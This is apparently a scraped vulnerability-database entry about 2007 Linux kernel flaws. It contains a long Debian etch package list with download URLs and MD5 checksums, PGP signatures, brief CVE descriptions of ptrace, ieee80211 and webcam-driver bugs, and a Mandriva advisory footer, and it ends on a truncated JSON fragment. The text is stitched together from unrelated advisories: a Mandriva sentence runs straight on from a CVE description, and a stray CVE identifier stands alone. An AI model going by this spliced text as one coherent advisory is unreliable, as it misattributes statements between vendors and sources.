http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-arm_2.6.18.dfsg.1-13etch1_arm.deb
  Size/MD5 checksum:    50694 19473ef72c0109f1ce9dc9dfd4f3de3d
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-footbridge_2.6.18.dfsg.1-13etch1_arm.deb
  Size/MD5 checksum:   225038 969f487c6c9d50fef7200e0a3ecb5c4b
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-iop32x_2.6.18.dfsg.1-13etch1_arm.deb
  Size/MD5 checksum:   226564 c5f03ec763dfb6b27d00f8f90e0ae9da
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-ixp4xx_2.6.18.dfsg.1-13etch1_arm.deb
  Size/MD5 checksum:   232748 bb9606e416b2aa84c3cc8071ac2350d8
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-rpc_2.6.18.dfsg.1-13etch1_arm.deb
  Size/MD5 checksum:   192126 cd01397be860265e013d55aa574c7347
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s3c2410_2.6.18.dfsg.1-13etch1_arm.deb
  Size/MD5 checksum:   194764 e05a0715a2bf9cbac171217b22314b19
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-footbridge_2.6.18.dfsg.1-13etch1_arm.deb
  Size/MD5 checksum:  7518754 018e9a847ff04f7fc3580f85bfc2abe1
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-iop32x_2.6.18.dfsg.1-13etch1_arm.deb
  Size/MD5 checksum:  7869416 e4750e15d602443f08ba02c7e7c2a137
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-ixp4xx_2.6.18.dfsg.1-13etch1_arm.deb
  Size/MD5 checksum:  8806748 7436ed2118660e9c7f4f4697ac5868c3
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-rpc_2.6.18.dfsg.1-13etch1_arm.deb
  Size/MD5 checksum:  4558510 68d071f5a09c182509bea873aef02105
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s3c2410_2.6.18.dfsg.1-13etch1_arm.deb
  Size/MD5 checksum:  4981066 6c261104c98cc528d6633f79274ad72a

HP Precision architecture:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_hppa.deb
  Size/MD5 checksum:  2964238 f6fd8c5dd6071370f953e496756851cf
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_hppa.deb
  Size/MD5 checksum:    50642 8aca6d6bffa3b334b71b66332dd125ae
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-hppa_2.6.18.dfsg.1-13etch1_hppa.deb
  Size/MD5 checksum:    50668 7dfc3cbdd0f0763008e0246015fe5c9f
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc_2.6.18.dfsg.1-13etch1_hppa.deb
  Size/MD5 checksum:   188488 31502e1f9bdcc0a24d6a7762f6f4cbe8
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc-smp_2.6.18.dfsg.1-13etch1_hppa.deb
  Size/MD5 checksum:   189420 e6deaa2c4a398b59a40a732cb9018940
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc64_2.6.18.dfsg.1-13etch1_hppa.deb
  Size/MD5 checksum:   189146 133d151b9aa064b61c90c0c9ce20656c
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc64-smp_2.6.18.dfsg.1-13etch1_hppa.deb
  Size/MD5 checksum:   189834 c7ada740b1647894ceda503d4ee8399b
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc_2.6.18.dfsg.1-13etch1_hppa.deb
  Size/MD5 checksum: 10498710 5d3ee84cc71a57eabe1d0647f704ad3c
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc-smp_2.6.18.dfsg.1-13etch1_hppa.deb
  Size/MD5 checksum: 10940810 8e1de20ffcc7df26862544af83f78771
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc64_2.6.18.dfsg.1-13etch1_hppa.deb
  Size/MD5 checksum: 11344516 a6fe777a6d6296c1d95c81c25931102e
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc64-smp_2.6.18.dfsg.1-13etch1_hppa.deb
  Size/MD5 checksum: 11751450 e0c73577059ad7ee24893278e8bb580c

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:  3164474 5581e6b60de382087f4e3cd05a326cd8
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-486_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:   277248 ff8b78d10cb79fc1c9258cd43a408499
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-686_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:   275932 874d04ecd1f692d9781e2cb47c687ee6
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-686-bigmem_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:   276286 dbcc90161edc6a46b7a89a10b0fc22ff
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:    50640 34b3065eb0fdc3a02576c9ebdd2508d9
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-i386_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:    50700 77d1ae15ad63b7e9675225a6ca7db47c
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-amd64_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:   268294 a60191beaaf0d62099dbd1a20eaf6b75
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-k7_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:   275830 f9a83308d8ecd6eb36d6791b864116c5
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:  3050892 8283afde8651de38ff35c68ac9d34feb
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:   273688 759941012b1848db94e34d6f1c57cfd6
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-k7_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:   273764 bc27c920b5a85c643d3f9a7fa3bb2f9f
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:  3145220 f0cee6bc58f389ef78fc3cbcad757197
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:   270550 b1aca209d3f63334b8512bd70e7fee04
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:  3167356 72a44aac33deb66d1eed41b37d9f6f84
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:   271130 cebd78501825a595f992a575371cd8b7
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-486_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum: 16170152 7dbf8514bc38e86a6d6454593628a9a8
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-686_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum: 16319248 a099f9f04a33385dc29a7cc5ed743411
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-686-bigmem_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum: 16384438 83d05912745de976a2648295241f0b15
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-amd64_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum: 16816198 1c14cd0e4867b12f05bea602a7940b11
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-k7_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum: 16449650 9c195ec1b9f2b5f2531017389234d817
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum: 16358054 727d0f2e6e821a34c527c44946660653
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-k7_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum: 16488812 1619800305c3c55e48f9b5484cd7ec39
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:  1296346 6f233c2b69738b9d577a4c1d7d9283a3
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:  1323270 c3ba3e1299340fe9666746ada15cafe2
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum: 14258314 37215c1b602209320153136ddae5b53d
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum: 14272088 00cfea4d19109eff959c360f63b90c18
http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:    50620 3d60ebbd894ac77ddaafaaba903083b8
http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb
  Size/MD5 checksum:    50636 9277c97ebb5c14fc93c5449c5e5a391c

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_ia64.deb
  Size/MD5 checksum:  3078390 7c1dc7cf08fdce40fdb01acd14c6167b
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_ia64.deb
  Size/MD5 checksum:    50644 4303c1255e6d4840b9ce34b8da158125
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-ia64_2.6.18.dfsg.1-13etch1_ia64.deb
  Size/MD5 checksum:    50662 5235fb30a8f35c91ea15335ee439a60d
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-itanium_2.6.18.dfsg.1-13etch1_ia64.deb
  Size/MD5 checksum:   251576 5b89eeb214501b0a1b6e2d2712763fe3
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-mckinley_2.6.18.dfsg.1-13etch1_ia64.deb
  Size/MD5 checksum:   251558 573aa9cc9fba9924a98a1b6ca786edfe
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-itanium_2.6.18.dfsg.1-13etch1_ia64.deb
  Size/MD5 checksum: 28008514 baaf3f87d60cb1d68c361cea849d3c27
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-mckinley_2.6.18.dfsg.1-13etch1_ia64.deb
  Size/MD5 checksum: 28178022 c6cb8de82903383b78c7a9646d7df7da

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_mips.deb
  Size/MD5 checksum:  3346354 c0c5d438a80a114ffbe515104f44785f
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_mips.deb
  Size/MD5 checksum:    50644 822db9efc5caba5bd3f96c2ffef90ce8
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-mips_2.6.18.dfsg.1-13etch1_mips.deb
  Size/MD5 checksum:    50692 9fbd9cb53ce75b25243adfb5568bd2f9
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mips.deb
  Size/MD5 checksum:   146348 4a2ede92f7cba5e409a01504a5787786
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r4k-ip22_2.6.18.dfsg.1-13etch1_mips.deb
  Size/MD5 checksum:   156600 b56c8fe624757cca08eafda9a7b62122
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r5k-ip32_2.6.18.dfsg.1-13etch1_mips.deb
  Size/MD5 checksum:   160930 14710075883c5cb17ed1f4dfa854461f
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mips.deb
  Size/MD5 checksum:   179380 f61160dd2e459a70170e5ba8524aea36
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mips.deb
  Size/MD5 checksum:   179154 aba921bcc75c80c0c96c727eac34afaf
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mips.deb
  Size/MD5 checksum:  6090314 99e9641ce38b6d0530199ad566738d73
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r4k-ip22_2.6.18.dfsg.1-13etch1_mips.deb
  Size/MD5 checksum:  8271518 6979492cd1b01cf3b76958211bfb3bdf
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r5k-ip32_2.6.18.dfsg.1-13etch1_mips.deb
  Size/MD5 checksum:  9037182 56824fbbc825d14d2fec62b2562f44ce
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mips.deb
  Size/MD5 checksum: 15636546 85bc62cca019e5d5c07374fe4ea05df8
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mips.deb
  Size/MD5 checksum: 15608670 233369e78b74fdca2143c971995440f5

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_mipsel.deb
  Size/MD5 checksum:  3346628 a208480b2fa7bdd13559b4078d03cac9
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_mipsel.deb
  Size/MD5 checksum:    50648 20d1bf2c345a889720562597f9300152
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-mipsel_2.6.18.dfsg.1-13etch1_mipsel.deb
  Size/MD5 checksum:    50712 31666ed837cac8aec136528616a7407f
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mipsel.deb
  Size/MD5 checksum:   146012 ec774ccba8d1783239b0f12cee90abe3
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r3k-kn02_2.6.18.dfsg.1-13etch1_mipsel.deb
  Size/MD5 checksum:   152252 99657c9b655c5f1bded07e4a5394d132
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r4k-kn04_2.6.18.dfsg.1-13etch1_mipsel.deb
  Size/MD5 checksum:   152340 0c0778fa59bda664f8cb4f0f1ba8f90b
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r5k-cobalt_2.6.18.dfsg.1-13etch1_mipsel.deb
  Size/MD5 checksum:   174444 8927ed0b8d880d99fcc79c64ecc44c54
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mipsel.deb
  Size/MD5 checksum:   179284 8b01ba01c4d2e0e4a1dbfd4acd5354ea
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mipsel.deb
  Size/MD5 checksum:   179144 368da689abd47ca70aced24efec5b040
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mipsel.deb
  Size/MD5 checksum:  6025698 a355ec38f440f7e08d0f22ce6184bcf8
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r3k-kn02_2.6.18.dfsg.1-13etch1_mipsel.deb
  Size/MD5 checksum:  5937952 2de36f1fdeb55373eb50fb77efe7f938
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r4k-kn04_2.6.18.dfsg.1-13etch1_mipsel.deb
  Size/MD5 checksum:  5921402 006d6d3d34f2db5b21500cdc8914dc08
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r5k-cobalt_2.6.18.dfsg.1-13etch1_mipsel.deb
  Size/MD5 checksum:  9857018 4246c3b15aae0df84b669381a8f1383e
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mipsel.deb
  Size/MD5 checksum: 15052960 317130eff4221493bf31349bb99d0eab
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mipsel.deb
  Size/MD5 checksum: 15019204 a5c6e183ff53d3c8fd169f0d2bc17ebc

PowerPC architecture:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum:  3388916 6d6415c4241ea26786fd3a72899e266f
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum:    50652 f19e0ad61b5e91f685e920a58248c8e9
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum:    50698 111c11da4f26a93122b76b6eac5b92c8
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum:   248366 7bafbd435e00ad6b647b347d84e1e0c1
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc-miboot_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum:   225218 90e19db35ef618a7e3f476576de60d95
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc-smp_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum:   248400 3dd8373a35220a27423c3f4eadd32358
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum:   248712 8a0281e9b856372f4d01c8a0f4b02d72
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-prep_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum:   242934 92f3fda2938f60fdf6f957f0659712ab
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum:  3411216 b9070329bf0a6045896db2fc15f66f0a
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum:   248448 e108e05b4fe2239d4e95fb6598405fd6
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum:   249006 3908dfaf4f518192bd550ca5ac45476f
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum: 16623606 b76fa67819092073c6bfc51904163278
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc-miboot_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum: 15149270 502237df8e0f90e7ab95b28cbe7a5f8f
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc-smp_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum: 16960668 69f13fe8bde671497363849f76636eda
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum: 18291108 9cc68d73b1bcf401176d1f93bd1dfeb1
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-prep_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum: 16395670 fbab6e355aba9c29f63603d097855c5e
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum: 17006732 cca0573ca442e02ad6f153fcc059f734
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb
  Size/MD5 checksum: 18340518 3940b166f8b0464baa118c8557922edb

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_s390.deb
  Size/MD5 checksum:  2939624 fada85c4d5ec9cbdee803116fde561b1
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_s390.deb
  Size/MD5 checksum:    50642 9478b247c93b2ba8b405f93b525307ae
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-s390_2.6.18.dfsg.1-13etch1_s390.deb
  Size/MD5 checksum:    50664 d694fdeff900e5b1ba575ad15bbd5310
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s390_2.6.18.dfsg.1-13etch1_s390.deb
  Size/MD5 checksum:   139294 02bcbe57d1b62129243c8cb4b7bb8d2d
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s390x_2.6.18.dfsg.1-13etch1_s390.deb
  Size/MD5 checksum:   139538 69993d0e2867ed4efa5bb0e442d3d014
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_s390.deb
  Size/MD5 checksum:  2962698 36d89e72ac15117d15a3488878d205a4
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-s390x_2.6.18.dfsg.1-13etch1_s390.deb
  Size/MD5 checksum:   140274 5b8bacca256347a7ce02783651110e35
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390_2.6.18.dfsg.1-13etch1_s390.deb
  Size/MD5 checksum:  5398576 b1054f70f0472fd020241b6af904438d
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390-tape_2.6.18.dfsg.1-13etch1_s390.deb
  Size/MD5 checksum:  1435060 daf41750946017171aad603b9218d0c4
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390x_2.6.18.dfsg.1-13etch1_s390.deb
  Size/MD5 checksum:  5613112 68d67210c4c6aa0ea54b1754df137d8e
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-s390x_2.6.18.dfsg.1-13etch1_s390.deb
  Size/MD5 checksum:  5659570 c6a2db3553a427cecf69d9f1258e9444

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_sparc.deb
  Size/MD5 checksum:  3164578 902a8ff3089225278575251ba13f1f98
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_sparc.deb
  Size/MD5 checksum:    50640 455bd9863c6f183ee28d15e7ba9ddc38
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-sparc_2.6.18.dfsg.1-13etch1_sparc.deb
  Size/MD5 checksum:    50674 8416d5c20659923183729457854e139f
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc32_2.6.18.dfsg.1-13etch1_sparc.deb
  Size/MD5 checksum:   161886 f58a554b0de7e05c4727bff1e236a069
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb
  Size/MD5 checksum:   191010 bad7bf07af89b1ba54ff559f99cf3d1b
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc64-smp_2.6.18.dfsg.1-13etch1_sparc.deb
  Size/MD5 checksum:   191776 f059b7c75ea312f69758d02e6da4cd4f
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_sparc.deb
  Size/MD5 checksum:  3186936 2a865cc6aed95cdc0ed3ebb20ec0a6d0
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb
  Size/MD5 checksum:   192172 197b2cd91975cbda876bc0ac18244870
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc32_2.6.18.dfsg.1-13etch1_sparc.deb
  Size/MD5 checksum:  6406184 e0ce977a5c79906c4996f069672e272b
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb
  Size/MD5 checksum: 10351700 69bc68d296d9134f6df792fb745c9810
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc64-smp_2.6.18.dfsg.1-13etch1_sparc.deb
  Size/MD5 checksum: 10610496 b40bc9a07de220a54a1489b22d1d60f4
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb
  Size/MD5 checksum: 10656362 91c6c66c24c7d5ca45c0e6eb5dcdcbba

These files will probably be moved into the stable distribution on its next update.


For apt-get: deb http://security.debian.org/ etch/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/etch/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGw6BUhuANDBmkLRkRAoORAJ9xahJqDWTm6CV7/bRjmcFCfPYJuACcDG5b 2aO+KPMNmsXmfH9W/1fMQtM= =L22s -----END PGP SIGNATURE-----


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . (CVE-2007-4133)

The IA32 system call emulation functionality in Linux kernel 2.4.x and 2.6.x before 2.6.22.7, when running on the x86_64 architecture, does not zero extend the eax register after the 32bit entry path to ptrace is used, which might allow local users to gain privileges by triggering an out-of-bounds access to the system call table using the %RAX register. (CVE-2007-4573)

Integer underflow in the ieee80211_rx function in net/ieee80211/ieee80211_rx.c in the Linux kernel 2.6.x before 2.6.23 allows remote attackers to cause a denial of service (crash) via a crafted SKB length value in a runt IEEE 802.11 frame when the IEEE80211_STYPE_QOS_DATA flag is set, aka an off-by-two error. (CVE-2007-4997)

The disconnect method in the Philips USB Webcam (pwc) driver in Linux kernel 2.6.x before 2.6.22.6 relies on user space to close the device, which allows user-assisted local attackers to cause a denial of service (USB subsystem hang and CPU consumption in khubd) by not closing the device after the disconnect is invoked. NOTE: this rarely crosses privilege boundaries, unless the attacker can convince the victim to unplug the affected device. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com


Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIM/QcmqjQ0CJFipgRAua3AKCyF+W5X84EyQ0rcplkQs8m3TeBDQCgvo2f AEfloFQ4ShfC936g0fSh5vo= =RHR2 -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
